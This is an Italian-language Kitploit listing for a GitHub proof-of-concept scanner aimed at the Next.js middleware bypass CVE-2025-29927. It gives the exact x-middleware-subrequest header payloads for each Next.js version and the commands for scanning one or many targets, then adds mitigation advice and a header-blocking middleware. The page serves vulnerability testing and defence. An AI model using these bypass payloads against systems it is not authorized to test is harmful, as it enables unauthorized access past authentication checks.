Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
poc-nextjs-CVE-2025-29927 — Scanner PoC automatizzato per la vulnerabilità di bypass del middleware Next.js CVE-2025-29927. Testa più payload x-middleware-subrequest su URL target con scansione concorrente ed esportazione JSON. | Kitploit
Strumenti/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

Scanner PoC automatizzato per la vulnerabilità di bypass del middleware Next.js CVE-2025-29927. Testa più payload x-middleware-subrequest su URL target con scansione concorrente ed esportazione JSON.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scanner di vulnerabilità middleware subrequest di Next.js

Un robusto strumento proof-of-concept (PoC) per rilevare la vulnerabilità del middleware di Next.js (CVE-2025-29927).

Panoramica

Questo strumento testa una vulnerabilità critica nelle applicazioni Next.js in cui l'header x-middleware-subrequest può essere utilizzato per bypassare i controlli di sicurezza implementati nel middleware. L'exploit prevede l'invio di richieste HTTP con specifici header dannosi, a seconda della versione di Next.js.

Come funziona l'exploit

Secondo la ricerca, esistono diversi payload per diverse versioni di Next.js:

  1. Versioni precedenti alla 12.2:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. Versioni dalla 12.2 in poi:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    oppure

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

    (se l'applicazione utilizza la directory src)

  • Versioni più recenti (come la 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    oppure

    root@kitploit:~
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    
  • La nostra PoC testa automaticamente tutti questi payload e segnala quale ha avuto successo.

    Funzionalità

    • Test di uno o più target
    • Scansione concorrente con multithreading
    • Percorsi di richiesta personalizzabili
    • Test automatico di tutti i payload possibili
    • Output dettagliato e colorato nel terminale
    • Esportazione dei risultati in JSON
    • Gestione robusta degli errori
    • Rilevamento completo delle vulnerabilità

    Requisiti

    • Python 3.7+
    • Pacchetti necessari:
      • requests
      • colorama

    Installazione

    root@kitploit:~
    # Clone o repositório ou baixe os arquivos
    # Navegue até o diretório
    cd poc-nextjs-2025
    
    # Instale os pacotes necessários
    pip install -r requirements.txt
    

    Utilizzo

    root@kitploit:~
    python main.py -u https://exemplo.com   # Testar uma única URL
    python main.py -f alvos.txt             # Testar múltiplas URLs de um arquivo
    

    Argomenti della riga di comando

    OpzioneDescrizione
    -u, --url URLURL di destinazione da scansionare
    -f, --file ARQUIVOFile contenente più URL da scansionare (una per riga)
    -p, --paths CAMINHOSElenco di percorsi da testare separati da virgola (predefiniti: percorsi comuni)
    -t, --threads NNumero di thread concorrenti (predefinito: 5)
    -o, --output ARQUIVOSalva i risultati in un file JSON
    --timeout NTimeout della richiesta in secondi (predefinito: 10)

    Esempi

    root@kitploit:~
    # Escaneamento básico de um único alvo
    python main.py -u https://exemplo.com
    
    # Escanear múltiplos alvos com caminhos personalizados
    python main.py -f alvos.txt -p /api/users,/admin,/dashboard
    
    # Escanear com maior concorrência e timeout mais longo
    python main.py -u https://exemplo.com -t 10 --timeout 15
    
    # Salvar resultados em um arquivo JSON
    python main.py -u https://exemplo.com -o resultados_scan.json
    

    Metodologia di rilevamento

    Lo scanner funziona tramite:

    1. Invio di una richiesta normale al target
    2. Invio di richieste con diverse varianti dell'header x-middleware-subrequest in base alle versioni di Next.js
    3. Confronto delle risposte per identificare indicatori di vulnerabilità:
      • Richiesta normale bloccata (4xx/5xx) ma richiesta exploit consentita (2xx)
      • Differenza significativa nel contenuto della risposta
      • Indicatori di bypass di autenticazione/autorizzazione

    Mitigazione

    Se scopri applicazioni vulnerabili, applica queste mitigazioni:

    • Aggiorna a Next.js 14.2.25, 15.2.3 o versioni successive
    • Implementa un middleware che blocchi le richieste con l'header x-middleware-subrequest
    root@kitploit:~
    export function middleware(request: NextRequest) {
      if (request.headers.has('x-middleware-subrequest')) {
        return new Response('Unauthorized', { status: 401 });
      }
      return NextResponse.next();
    }
    
    Scarica lo strumento